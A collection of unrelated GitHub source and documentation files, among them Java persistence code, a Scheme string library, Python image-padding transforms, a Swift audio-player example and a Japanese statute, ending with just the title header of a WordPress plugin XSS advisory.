if (em == null) throw new IllegalStateException("Entity manager has not been injected (is the Spring Aspects JAR configured as an AJC/AJDT aspects library?)");
return em;
}
public static long HisDoc.countHisDocs() {
return entityManager().createQuery("SELECT COUNT(o) FROM HisDoc o", Long.class).getSingleResult();
}
public static List<HisDoc> HisDoc.findAllHisDocs() {
return entityManager().createQuery("SELECT o FROM HisDoc o", HisDoc.class).getResultList();
}
public static HisDoc HisDoc.findHisDoc(Integer id) {
if (id == null) return null;
return entityManager().find(HisDoc.class, id);
}
public static List<HisDoc> HisDoc.findHisDocEntries(int firstResult, int maxResults) {
return entityManager().createQuery("SELECT o FROM HisDoc o", HisDoc.class).setFirstResult(firstResult).setMaxResults(maxResults).getResultList();
}
@Transactional
public void HisDoc.persist() {
if (this.entityManager == null) this.entityManager = entityManager();
this.entityManager.persist(this);
}
@Transactional
public void HisDoc.remove() {
if (this.entityManager == null) this.entityManager = entityManager();
if (this.entityManager.contains(this)) {
this.entityManager.remove(this);
} else {
HisDoc attached = HisDoc.findHisDoc(this.id);
this.entityManager.remove(attached);
}
}
@Transactional
public void HisDoc.flush() {
if (this.entityManager == null) this.entityManager = entityManager();
this.entityManager.flush();
}
@Transactional
public void HisDoc.clear() {
if (this.entityManager == null) this.entityManager = entityManager();
this.entityManager.clear();
}
@Transactional
public HisDoc HisDoc.merge() {
if (this.entityManager == null) this.entityManager = entityManager();
HisDoc merged = this.entityManager.merge(this);
this.entityManager.flush();
return merged;
}
}
| {
"pile_set_name": "Github"
} |
package com.dotcms.publisher.assets.business;
import com.dotcms.publisher.assets.bean.PushedAsset;
import com.dotcms.publisher.util.PublisherUtil;
import com.dotmarketing.business.CacheLocator;
import com.dotmarketing.common.db.DotConnect;
import com.dotmarketing.db.DbConnectionFactory;
import com.dotmarketing.exception.DotDataException;
import com.dotmarketing.util.UtilMethods;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
public class PushedAssetsFactoryImpl extends PushedAssetsFactory {
private PushedAssetsCache cache=CacheLocator.getPushedAssetsCache();
public void savePushedAsset(PushedAsset asset) throws DotDataException {
final DotConnect db = new DotConnect();
db.setSQL(INSERT_ASSETS);
db.addParam(asset.getBundleId());
db.addParam(asset.getAssetId());
db.addParam(asset.getAssetType());
db.addParam(asset.getPushDate());
db.addParam(asset.getEnvironmentId());
db.addParam(asset.getEndpointIds());
db.addParam(asset.getPublisher());
db.loadResult();
cache.removePushedAssetById(asset.getAssetId(), asset.getEnvironmentId());
}
@Override
public void deletePushedAssets(String bundleId, String environmentId)
throws DotDataException {
final DotConnect db = new DotConnect();
db.setSQL(DELETE_ASSETS_BY_BUNDLE_ENV);
db.addParam(bundleId);
db.addParam(environmentId);
db.loadResult();
cache.clearCache();
}
@Override
public void deletePushedAssetsByBundle(final String bundleId) throws DotDataException {
final DotConnect db = new DotConnect();
db.setSQL(DELETE_ASSETS_BY_BUNDLE);
db.addParam(bundleId);
db.loadResult();
cache.clearCache();
}
@Override
public void deletePushedAssets(String assetId)
throws DotDataException {
final DotConnect db = new DotConnect();
db.setSQL(DELETE_ASSETS_BY_ASSET_ID);
db.addParam(assetId);
db.loadResult();
cache.clearCache();
}
@Override
public void deletePushedAssetsByEnvironment(final String assetId, final String environmentId) throws DotDataException {
new DotConnect().setSQL(DELETE_ASSETS_BY_ASSET_ID_AND_ENV)
.addParam(assetId).addParam(environmentId).loadResult();
cache.removePushedAssetById(assetId, environmentId);
}
@Override
public void deletePushedAssetsByEnvironment(String environmentId)
throws DotDataException {
final DotConnect db = new DotConnect();
db.setSQL(DELETE_ASSETS_BY_ENVIRONMENT_ID);
db.addParam(environmentId);
db.loadResult();
cache.clearCache();
}
@Override
public List<PushedAsset> getPushedAssets(String bundleId, String environmentId)
throws DotDataException {
List<PushedAsset> assets = new ArrayList<PushedAsset>();
if(!UtilMethods.isSet(bundleId) || !UtilMethods.isSet(environmentId)) {
return assets;
}
DotConnect dc = new DotConnect();
dc.setSQL(SELECT_ASSETS_BY_BUNDLE_ENV);
dc.addParam(bundleId);
dc.addParam(environmentId);
List<Map<String, Object>> res = dc.loadObjectResults();
for(Map<String, Object> row : res){
PushedAsset asset = PublisherUtil.getPushedAssetByMap(row);
assets.add(asset);
}
return assets;
}
@Override
public void deleteAllPushedAssets() throws DotDataException {
final DotConnect db = new DotConnect();
db.setSQL(DELETE_ALL_ASSETS);
db.loadResult();
cache.clearCache();
}
@Override
public List<PushedAsset> getPushedAssets(String assetId)
throws DotDataException {
List<PushedAsset> assets = new ArrayList<PushedAsset>();
if(!UtilMethods.isSet(assetId)) {
return assets;
}
DotConnect dc = new DotConnect();
dc.setSQL(SELECT_ASSETS_BY_ASSET_ID);
dc.addParam(assetId);
List<Map<String, Object>> res = dc.loadObjectResults();
for(Map<String, Object> row : res){
PushedAsset asset = PublisherUtil.getPushedAssetByMap(row);
assets.add(asset);
}
return assets;
}
@Override
public List<PushedAsset> getPushedAssetsByEnvironment(String environmentId)
throws DotDataException {
List<PushedAsset> assets = new ArrayList<PushedAsset>();
if(!UtilMethods.isSet(environmentId)) {
return assets;
}
DotConnect dc = new DotConnect();
dc.setSQL(SELECT_ASSETS_BY_ENV_ID);
dc.addParam(environmentId);
List<Map<String, Object>> res = dc.loadObjectResults();
for(Map<String, Object> row : res){
PushedAsset asset = PublisherUtil.getPushedAssetByMap(row);
assets.add(asset);
}
return assets;
}
public PushedAsset getLastPushForAsset(final String assetId, final String environmentId, final String endpointIds) throws DotDataException {
PushedAsset asset = cache.getPushedAsset(assetId, environmentId);
if(null == asset ){
final DotConnect dc = new DotConnect();
if(DbConnectionFactory.isOracle()){
dc.setSQL(SELECT_ASSET_LAST_PUSHED_ORACLE);
} else {
dc.setSQL(SELECT_ASSET_LAST_PUSHED);
}
dc.addParam(assetId);
dc.addParam(environmentId);
dc.addParam(endpointIds);
dc.setMaxRows(1);
final List<Map<String, Object>> results = dc.loadObjectResults();
for(final Map<String, Object> row : results) {
asset = PublisherUtil.getPushedAssetByMap(row);
cache.add(asset);
}
}
return asset;
}
}
| {
"pile_set_name": "Github"
} |
#|
LambdaNative - a cross-platform Scheme framework
Copyright (c) 2009-2013, University of British Columbia
All rights reserved.
Redistribution and use in source and binary forms, with or
without modification, are permitted provided that the
following conditions are met:
* Redistributions of source code must retain the above
copyright notice, this list of conditions and the following
disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials
provided with the distribution.
* Neither the name of the University of British Columbia nor
the names of its contributors may be used to endorse or
promote products derived from this software without specific
prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|#
;; misc string manipulation
(define (string-trim str)
(if (string? str) (begin
;; Take any spaces off the front of the string
(set! str (let loop ((startstr str))
(if (and (fx> (string-length startstr) 0) (char=? (string-ref startstr 0) #\space))
(loop (substring startstr 1 (string-length startstr)))
startstr)))
;; Take any spaces off the end of the string and return it
(let loop2 ((endstr str))
(if (and (fx> (string-length endstr) 0) (char=? (string-ref endstr (- (string-length endstr) 1)) #\space))
(loop2 (substring endstr 0 (- (string-length endstr) 1)))
endstr)))
#f))
(define (string-remove-quotes str)
(let ((strlength (string-length str)))
(if (and
(fx>= (string-length str) 2)
;; If it starts with quotation marks
(string=? (substring str 0 1) "\"")
;; and ends with quotation marks
(string=? (substring str (- strlength 1) strlength) "\""))
;; Return string without quotation marks
(substring str 1 (- strlength 1))
;; Otherwise just return copy of same string
str))
)
(define (string-remove-spaces str)
(string-remove-char str #\space)
)
(define (string-remove-char str chr)
(let loop ((ret (list)) (lst (string->list str)))
(if (not (pair? lst))
(list->string ret)
(loop (if (char=? (car lst) chr) ret (append ret (list (car lst)))) (cdr lst))
)
)
)
(define string-split (lambda (str sep)
(if (string? str) (call-with-input-string str
(lambda (p) (read-all p (lambda (p) (read-line p sep))))) #f)))
(define (string-upcase! str)
(do ((i (- (string-length str) 1) (- i 1)))
((< i 0) str)
(string-set! str i (char-upcase (string-ref str i)))))
(define (string-upcase str)
(string-upcase! (string-copy str)))
(define (string-downcase! str)
(do ((i (- (string-length str) 1) (- i 1)))
((< i 0) str)
(string-set! str i (char-downcase (string-ref str i)))))
(define (string-downcase str)
(string-downcase! (string-copy str)))
(define (string-capitalize! str) ; "hello" -> "Hello"
(let ((non-first-alpha #f) ; "hELLO" -> "Hello"
(str-len (string-length str))) ; "*hello" -> "*Hello"
(do ((i 0 (+ i 1))) ; "hello you" -> "Hello You"
((= i str-len) str)
(let ((c (string-ref str i)))
(if (char-alphabetic? c)
(if non-first-alpha
(string-set! str i (char-downcase c))
(begin
(set! non-first-alpha #t)
(string-set! str i (char-upcase c))))
(set! non-first-alpha #f))))))
(define (string-capitalize str)
(string-capitalize! (string-copy str)))
(define string-explode (lambda (str seplst)
(let loop ((strlst (string->list str))(tmp "")(res '()))
(if (= (length strlst) 0) (append res
(if (> (string-length tmp) 0) (list tmp) '()))
(let ((chop? (member (car strlst) seplst)))
(loop (cdr strlst) (if chop? "" (string-append tmp (string (car strlst))))
(if chop? (append res (list tmp)
(list (string (car strlst)))) res)))))))
(define (string-index str a-char . comp)
(let ((cmp (if (= (length comp) 1) (car comp) char=?)))
(let loop ((pos 0)) (cond
((>= pos (string-length str)) #f)
((cmp a-char (string-ref str pos)) pos)
(else (loop (fx+ pos 1)))))))
(define (string:contains str pattern cmp)
(let* ((pat-len (string-length pattern))
(search-span (- (string-length str) pat-len))
(c1 (if (zero? pat-len) #f (string-ref pattern 0)))
(c2 (if (<= pat-len 1) #f (string-ref pattern 1))))
(cond
((not c1) 0)
((not c2) (string-index str c1 cmp))
(else (let outer ((pos 0))
(cond
((> pos search-span) #f)
((not (cmp c1 (string-ref str pos)))
(outer (+ 1 pos)))
((not (cmp c2 (string-ref str (+ 1 pos))))
(outer (+ 1 pos)))
(else (let inner ((i-pat 2) (i-str (+ 2 pos)))
(if (>= i-pat pat-len) pos
(if (cmp (string-ref pattern i-pat) (string-ref str i-str))
(inner (+ 1 i-pat) (+ 1 i-str))
(outer (+ 1 pos))))))))))))
(define (string-contains str pattern) (string:contains str pattern char=?))
(define (string-contains-ci str pattern) (string:contains str pattern char-ci=?))
(define (string-count str pattern)
;; Each time the pattern is found take a substring until no longer found
(let loop ((curstr str) (count 0))
(let ((index (string:contains curstr pattern char=?)))
;; If pattern still found in string
(if index
;; If pattern starts at the end of the string - then last occurence
(if (fx= index (- (string-length curstr) 1))
(+ count 1)
(loop (substring curstr (+ index 1) (string-length curstr)) (+ count 1)))
count)))
)
(define (string-mapconcat sequence separator . proc)
(if (fx> (length sequence) 0)
(let* ((p (if (fx= (length proc) 1) (car proc) (lambda (x) x)))
(rev (reverse
(map (lambda (item)
(let ((val (p item)))
(cond
((string? val) val)
((char? val) (make-string 1 val))
(else (with-output-to-string "" (lambda () (write val)))))))
(cond
((list? sequence) sequence)
((vector? sequence) (vector->list sequence))
((string? sequence) (string->list sequence))
(else #f))))))
(apply string-append
(let loop ((s (cdr rev))
(acc (list (car rev))))
(if (null? s) acc (loop
(cdr s)
(cons (car s) (cons separator acc)))))))
;; If an empty list, then return an empty string
"")
)
(define (string-replace-char str oldchr newchr)
(if (and (string? str) (char? oldchr) (char? newchr))
(let loop ((i 0) (newstr (string-copy str)))
(if (fx= i (string-length str)) newstr
(loop (+ i 1) (begin (if (char=? (string-ref str i) oldchr) (string-set! newstr i newchr)) newstr))
))
str))
(define (string-replace-substring str searchstr replacestr)
(let ((searchstrlen (string-length searchstr)))
(if (and (string? str) (string? searchstr)
(string? replacestr) (>= (string-length str) (string-length searchstr)))
(let loop ((substr str)(res ""))
(if (= (string-length substr) 0) res
(let ((match? (and (>= (string-length substr) searchstrlen)
(string=? (substring substr 0 searchstrlen) searchstr))))
(loop (substring substr (if match? searchstrlen 1) (string-length substr))
(string-append res (if match? replacestr (substring substr 0 1))))))) str)))
(define (string-split-into-two str)
;; First trim the string
(set! str (string-trim str))
;; Handle the empty string by just returning two empty strings - one for each line
(if (fx= (string-length str) 0)
(list "" "")
;; Keep track of first and second line as lists of words
(let loop ((first (string-split str #\space)) (second (list)) (bestw (string-length str)))
(let* ((moveindex (- (length first) 1))
;; Move word from first line to second
(newfirst (list-head first moveindex))
(newsecond (append (list (list-ref first moveindex)) second))
;; Get new character count width needed for the two lines
(neww (max (string-length (string-mapconcat newfirst " ")) (string-length (string-mapconcat newsecond " ")))))
(if (< neww bestw)
;; If still better than the last, try moving another word
(loop newfirst newsecond neww)
;; Otherwise the last combination was best, recombine words of each line and return
(list (string-mapconcat first " ") (string-mapconcat second " "))))))
)
;; Inserts s after i characters in str
;; Precondition: 0 <= i <= (string-length str)
(define (string-insert-at str s i)
(string-append (substring str 0 i) s (substring str i (string-length str))))
;; @deffn {procedure} string-split-width str width font
;; Returns a modified version of string str which is wrapped
;; to fit into a window of width w using the fontsize obtained from font
;; --> Moved to glgui/glgui-primitives to prevent warning in Console apps.
(define (string-prefix? pattern str)
(let loop ((i 0))
(cond
((>= i (string-length pattern)) #t)
((>= i (string-length str)) #f)
((char=? (string-ref pattern i) (string-ref str i))
(loop (fx+ i 1)))
(else #f))))
(define (string-prefix-ci? pattern str)
(let loop ((i 0))
(cond
((>= i (string-length pattern)) #t)
((>= i (string-length str)) #f)
((char-ci=? (string-ref pattern i) (string-ref str i))
(loop (fx+ i 1)))
(else #f))))
(define (string-suffix? pattern str)
(let loop ((i (fx- (string-length pattern) 1)) (j (fx- (string-length str) 1)))
(cond
((negative? i) #t)
((negative? j) #f)
((char=? (string-ref pattern i) (string-ref str j))
(loop (fx- i 1) (fx- j 1)))
(else #f))))
(define (string-suffix-ci? pattern str)
(let loop ((i (fx- (string-length pattern) 1)) (j (fx- (string-length str) 1)))
(cond
((negative? i) #t)
((negative? j) #f)
((char-ci=? (string-ref pattern i) (string-ref str j))
(loop (fx- i 1) (fx- j 1)))
(else #f))))
;; https://srfi.schemers.org/srfi-28/srfi-28.html
(define (string-format format-string . objects)
(let ((buffer (open-output-string)))
(let loop ((format-list (string->list format-string))
(objects objects))
(cond ((null? format-list) (get-output-string buffer))
((char=? (car format-list) #\~)
(if (null? (cdr format-list))
(error 'format "Incomplete escape sequence")
(case (cadr format-list)
((#\a)
(if (null? objects)
(error 'format "No value for escape sequence")
(begin
(display (car objects) buffer)
(loop (cddr format-list) (cdr objects)))))
((#\s)
(if (null? objects)
(error 'format "No value for escape sequence")
(begin
(write (car objects) buffer)
(loop (cddr format-list) (cdr objects)))))
((#\%)
(newline buffer)
(loop (cddr format-list) objects))
((#\~)
(write-char #\~ buffer)
(loop (cddr format-list) objects))
(else
(error 'format "Unrecognized escape sequence")))))
(else (write-char (car format-list) buffer)
(loop (cdr format-list) objects))))))
;; eof
| {
"pile_set_name": "Github"
} |
// Forward to the target if the trap is not defined
var target = { foo: 'bar' };
for (let p of [new Proxy(target, {}), Proxy.revocable(target, {}).proxy]) {
assertEq(p.foo, 'bar');
assertEq(p['foo'], 'bar');
}
if (typeof Symbol === "function") {
var s = Symbol.for("moon");
var obj = {};
obj[s] = "dust";
for (let p of [new Proxy(obj, {}), Proxy.revocable(obj, {}).proxy])
assertEq(p[s], "dust");
}
| {
"pile_set_name": "Github"
} |
@if (ViewContext.ModelState.IsValid == false)
{
<div class="alert alert-danger">
<strong>Error</strong>
<div asp-validation-summary="All" class="danger"></div>
</div>
} | {
"pile_set_name": "Github"
} |
fileFormatVersion: 2
guid: 897a479a4b813dd4dad8b385d35c2370
folderAsset: yes
timeCreated: 1497998668
licenseType: Pro
DefaultImporter:
userData:
assetBundleName:
assetBundleVariant:
| {
"pile_set_name": "Github"
} |
import copy
import math
import logging
import torchvision
from .preprocess import Preprocess
LOG = logging.getLogger(__name__)
class CenterPad(Preprocess):
def __init__(self, target_size):
if isinstance(target_size, int):
target_size = (target_size, target_size)
self.target_size = target_size
def __call__(self, image, anns, meta):
meta = copy.deepcopy(meta)
anns = copy.deepcopy(anns)
LOG.debug('valid area before pad: %s, image size = %s', meta['valid_area'], image.size)
image, anns, ltrb = self.center_pad(image, anns)
meta['offset'] -= ltrb[:2]
meta['valid_area'][:2] += ltrb[:2]
LOG.debug('valid area after pad: %s, image size = %s', meta['valid_area'], image.size)
return image, anns, meta
def center_pad(self, image, anns):
w, h = image.size
left = int((self.target_size[0] - w) / 2.0)
top = int((self.target_size[1] - h) / 2.0)
if left < 0:
left = 0
if top < 0:
top = 0
right = self.target_size[0] - w - left
bottom = self.target_size[1] - h - top
if right < 0:
right = 0
if bottom < 0:
bottom = 0
ltrb = (left, top, right, bottom)
LOG.debug('pad with %s', ltrb)
# pad image
image = torchvision.transforms.functional.pad(
image, ltrb, fill=(124, 116, 104))
# pad annotations
for ann in anns:
ann['keypoints'][:, 0] += ltrb[0]
ann['keypoints'][:, 1] += ltrb[1]
ann['bbox'][0] += ltrb[0]
ann['bbox'][1] += ltrb[1]
return image, anns, ltrb
class CenterPadTight(Preprocess):
def __init__(self, multiple):
self.multiple = multiple
def __call__(self, image, anns, meta):
meta = copy.deepcopy(meta)
anns = copy.deepcopy(anns)
LOG.debug('valid area before pad: %s, image size = %s', meta['valid_area'], image.size)
image, anns, ltrb = self.center_pad(image, anns)
meta['offset'] -= ltrb[:2]
meta['valid_area'][:2] += ltrb[:2]
LOG.debug('valid area after pad: %s, image size = %s', meta['valid_area'], image.size)
return image, anns, meta
def center_pad(self, image, anns):
w, h = image.size
target_width = math.ceil((w - 1) / self.multiple) * self.multiple + 1
target_height = math.ceil((h - 1) / self.multiple) * self.multiple + 1
left = int((target_width - w) / 2.0)
top = int((target_height - h) / 2.0)
if left < 0:
left = 0
if top < 0:
top = 0
right = target_width - w - left
bottom = target_height - h - top
if right < 0:
right = 0
if bottom < 0:
bottom = 0
ltrb = (left, top, right, bottom)
LOG.debug('pad with %s', ltrb)
# pad image
image = torchvision.transforms.functional.pad(
image, ltrb, fill=(124, 116, 104))
# pad annotations
for ann in anns:
ann['keypoints'][:, 0] += ltrb[0]
ann['keypoints'][:, 1] += ltrb[1]
ann['bbox'][0] += ltrb[0]
ann['bbox'][1] += ltrb[1]
return image, anns, ltrb
class SquarePad(Preprocess):
def __call__(self, image, anns, meta):
center_pad = CenterPad(max(image.size))
return center_pad(image, anns, meta)
| {
"pile_set_name": "Github"
} |
/**
* The MIT License
* Copyright (c) 2014-2016 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.specification.creature;
import com.iluwatar.specification.property.Color;
import com.iluwatar.specification.property.Movement;
import com.iluwatar.specification.property.Size;
/**
*
* Base class for concrete creatures.
*
*/
public abstract class AbstractCreature implements Creature {
private String name;
private Size size;
private Movement movement;
private Color color;
/**
* Constructor
*/
public AbstractCreature(String name, Size size, Movement movement, Color color) {
this.name = name;
this.size = size;
this.movement = movement;
this.color = color;
}
@Override
public String toString() {
return String.format("%s [size=%s, movement=%s, color=%s]", name, size, movement, color);
}
@Override
public String getName() {
return name;
}
@Override
public Size getSize() {
return size;
}
@Override
public Movement getMovement() {
return movement;
}
@Override
public Color getColor() {
return color;
}
}
| {
"pile_set_name": "Github"
} |
---
type: introduction
section: introduction
locale: zh-CN
---
<span class="first-line"><span class="first-letter">JavaScript</span> 一直在发展。</span>新的库、框架、语言依旧层出不穷。这让前端开发变得十分有趣,同时,也让从业者感到力不从心。
为此,我们创立了 State of JavaScript 调查。今年,为了了解到开发者在用什么、喜欢什么、想学什么,我们调查了超过 20000 名 JavaScript 开发从业者。希望这些调查结果可以帮助你了解 JavaScript 生态圈的现状,并为你接下来的学习提供一定的参考。
如果你想进一步了解今年我们做了哪些改善,请看[这篇博文](https://medium.freecodecamp.org/the-state-of-javascript-2018-8322bcc51bd8)。
### 资源
我们注意到,很多人查看调查结果是为了决定接下来要学什么。因此,我们加入了一些优质的 JavaScript 学习资源,希望能为你指明方向。
声明:学习资源中,有些是我们的付费赞助商。尽管如此,这些学习资源的质量是毋庸置疑的。支持我们项目的人,也都是我们认识或者尊敬的人。
### 团队
State of JavaScript 调查是由以下人员创建并维护的:
- [Sacha Greif](https://twitter.com/sachagreif)(译者注:英文原文的作者):设计、撰写文章、编写代码
- [Raphael Benitte](https://twitter.com/benitteraphael):数据分析、数据可视化
- [Michael Rambeau](https://twitter.com/michaelrambeau):撰写文章、额外的数据统计
欢迎了解我的 React 与 GraphQL 的 JavaScript 框架 [Vulcan.js](http://vulcanjs.org);Raphael 的 React 数据可视化库 [Nivo.js](https://nivo.rocks);以及 Michael 的 JavaScript 工具推荐与排行榜 [Best of JS](https://bestofjs.org)。
### 下载我们的数据
你可以在[这里](https://www.kaggle.com/sachag/state-of-javascript-2018)下载调查结果数据。如果你基于此数据做出了自己的数据可视化页面,请告知我们!
### 其他链接
- [State of JavaScript 主页](https://stateofjs.com)
- [2016](https://2016.stateofjs.com/)
- [2017](https://2017.stateofjs.com/)
### 感谢
本网站字体选用 IMB Plex Mono。火焰动图引用自 [Animal Jam](https://animal-jam-roleplay.wikia.com/wiki/File:Pixel-fire-gif-1.gif)。如果你有任何问题与反馈,或者想获取调查结果的源数据,请[联系我们](mailto:[email protected])
现在,就让我们来看看今年的 JavaScript 发展情况吧!
P.S. 我们在今年的网站上花了大量精力。如果你到处乱点,小心把网站弄坏噢!
<span class="conclusion__byline">– Sacha, Raphaël, and Michael</span>
| {
"pile_set_name": "Github"
} |
国の補助金等の臨時特例等に関する法律 抄
(平成三年三月三十日法律第十五号)最終改正:平成五年三月三一日法律第八号
第一章 総理府関係(第一条―第十条)
第二章 大蔵省関係(第十一条)
第三章 文部省関係(第十二条―第十四条)
第四章 農林水産省関係(第十五条・第十六条)
第五章 運輸省関係(第十七条―第二十一条)
第六章 建設省関係(第二十二条―第三十一条)
第七章 自治省関係(第三十二条・第三十三条)
第八章 地方公共団体に対する財政金融上の措置(第三十四条)
附則
第一章 総理府関係
(国土調査法の一部改正)
第一条
略
(離島振興法の一部改正)
第二条
略
(奄美群島振興開発特別措置法の一部改正)
第三条
略
(豪雪地帯対策特別措置法の一部改正)
第四条
略
(沖縄振興開発特別措置法の一部改正)
第五条
略
(琵琶湖総合開発特別措置法の一部改正)
第六条
略
(水源地域対策特別措置法の一部改正)
第七条
略
(明日香村における歴史的風土の保存及び生活環境の整備等に関する特別措置法の一部改正)
第八条
略
(奄美群島振興開発特別措置法及び小笠原諸島振興特別措置法の一部を改正する法律の一部改正)
第九条
略
(過疎地域活性化特別措置法の一部改正)
第十条
略
第二章 大蔵省関係
(地震再保険特別会計法の一部改正)
第十一条
略
第三章 文部省関係
(義務教育費国庫負担法の一部改正)
第十二条
略
(公立養護学校整備特別措置法の一部改正)
第十三条
略
(義務教育諸学校施設費国庫負担法の一部改正)
第十四条
略
第四章 農林水産省関係
(漁港法の一部改正)
第十五条
略
(森林法の一部改正)
第十六条
略
第五章 運輸省関係
(港湾法の一部改正)
第十七条
略
(北海道開発のためにする港湾工事に関する法律の一部改正)
第十八条
略
(自動車損害賠償保障法の一部改正)
第十九条
略
(空港整備法の一部改正)
第二十条
略
(特定港湾施設整備特別措置法の一部改正)
第二十一条
略
第六章 建設省関係
(砂防法の一部改正)
第二十二条
略
(道路法の一部改正)
第二十三条
略
(積雪寒冷特別地域における道路交通の確保に関する特別措置法の一部改正)
第二十四条
略
(海岸法の一部改正)
第二十五条
略
(地すべり等防止法の一部改正)
第二十六条
略
(道路整備緊急措置法の一部改正)
第二十七条
略
(奥地等産業開発道路整備臨時措置法の一部改正)
第二十八条
略
(河川法の一部改正)
第二十九条
略
(河川法施行法の一部改正)
第三十条
略
(交通安全施設等整備事業に関する緊急措置法の一部改正)
第三十一条
略
第七章 自治省関係
(新東京国際空港周辺整備のための財政上の特別措置に関する法律の一部改正)
第三十二条
略
(公害の防止に関する事業に係る国の財政上の特別措置に関する法律の一部改正)
第三十三条
略
第八章 地方公共団体に対する財政金融上の措置
(地方公共団体に対する財政金融上の措置)
第三十四条
国は、この法律の規定による改正後の法律の規定により平成三年度及び平成四年度の予算に係る国の負担又は補助の割合の引下げ措置の対象となる地方公共団体に対し、その事務又は事業の執行及び財政運営に支障を生ずることのないよう財政金融上の措置を講ずるものとする。
附 則 抄
1
この法律は、平成三年四月一日から施行する。
附 則 (平成五年三月三一日法律第八号) 抄
(施行期日等)
1
この法律は、平成五年四月一日から施行する。
| {
"pile_set_name": "Github"
} |
%YAML 1.1
%TAG !u! tag:unity3d.com,2011:
--- !u!55 &1
PhysicsManager:
m_ObjectHideFlags: 0
serializedVersion: 3
m_Gravity: {x: 0, y: -9.81, z: 0}
m_DefaultMaterial: {fileID: 0}
m_BounceThreshold: 2
m_SleepThreshold: 0.005
m_DefaultContactOffset: 0.01
m_DefaultSolverIterations: 6
m_DefaultSolverVelocityIterations: 1
m_QueriesHitBackfaces: 0
m_QueriesHitTriggers: 1
m_EnableAdaptiveForce: 0
m_EnablePCM: 1
m_LayerCollisionMatrix: ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
| {
"pile_set_name": "Github"
} |
Expectations for DNS Seed operators
====================================
This document has been relocated to https://zcash.readthedocs.io/en/latest/rtd_pages/dnsseed_policy.html
The source for this document is available at https://gitlab.com/zcash-docs/zcash-docs/blob/master/source/rtd_pages/dnsseed_policy.rst | {
"pile_set_name": "Github"
} |
//
// ViewController.swift
// HysteriaPlayerSwiftExample
//
// Created by Stan on 8/17/15.
// Copyright © 2015 saiday. All rights reserved.
//
import UIKit
import HysteriaPlayer
class ViewController: UIViewController, HysteriaPlayerDelegate, HysteriaPlayerDataSource{
lazy var hysteriaPlayer = HysteriaPlayer.sharedInstance()
override func viewDidLoad() {
super.viewDidLoad()
// This is a very simple project demonstrate how to use
// HysteriaPlayer in Swift, detailed instructions about
// HysteriaPlayer are included in another objc example project.
initHysteriaPlayer()
hysteriaPlayer.fetchAndPlayPlayerItem(0)
}
func initHysteriaPlayer() {
hysteriaPlayer.delegate = self;
hysteriaPlayer.datasource = self;
}
func hysteriaPlayerNumberOfItems() -> Int {
return 3
}
func hysteriaPlayerURLForItemAtIndex(index: Int, preBuffer: Bool) -> NSURL! {
var url: NSURL
switch index {
case 0:
url = NSURL(string: "http://a929.phobos.apple.com/us/r1000/143/Music3/v4/2c/4e/69/2c4e69d7-bd0f-8c76-30ca-75f6a2f51ef5/mzaf_1157339944153759874.plus.aac.p.m4a")!;
break
case 1:
url = NSURL(string: "http://a1136.phobos.apple.com/us/r1000/042/Music5/v4/85/34/8d/85348d57-5bf9-a4a3-9f54-0c3f1d8bc6af/mzaf_5184604190043403959.plus.aac.p.m4a")!;
break
case 2:
url = NSURL(string: "http://a345.phobos.apple.com/us/r1000/046/Music5/v4/52/53/4b/52534b36-620e-d7f3-c9a8-2f9661652ff5/mzaf_2360247732780989514.plus.aac.p.m4a")!;
break
default:
url = NSURL()
break
}
return url;
}
func hysteriaPlayerReadyToPlay(identifier: HysteriaPlayerReadyToPlay) {
switch(identifier) {
case .CurrentItem:
hysteriaPlayer.play()
break
default:
break
}
}
}
| {
"pile_set_name": "Github"
} |
// ==========================================================================
// Squidex Headless CMS
// ==========================================================================
// Copyright (c) Squidex UG (haftungsbeschränkt)
// All rights reserved. Licensed under the MIT license.
// ==========================================================================
namespace Squidex.Domain.Apps.Entities.Schemas.Commands
{
public sealed class EnableField : FieldCommand
{
}
}
| {
"pile_set_name": "Github"
} |
===========================================================
Stored XSS Vulnerability in WP Statistics Wordpress Plugin
===========================================================
. contents:: Table Of Content
Overview
========
* Title :Stored XSS Vulnerability in WP Statistics Wordpress Plugin
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/wp-statistics/
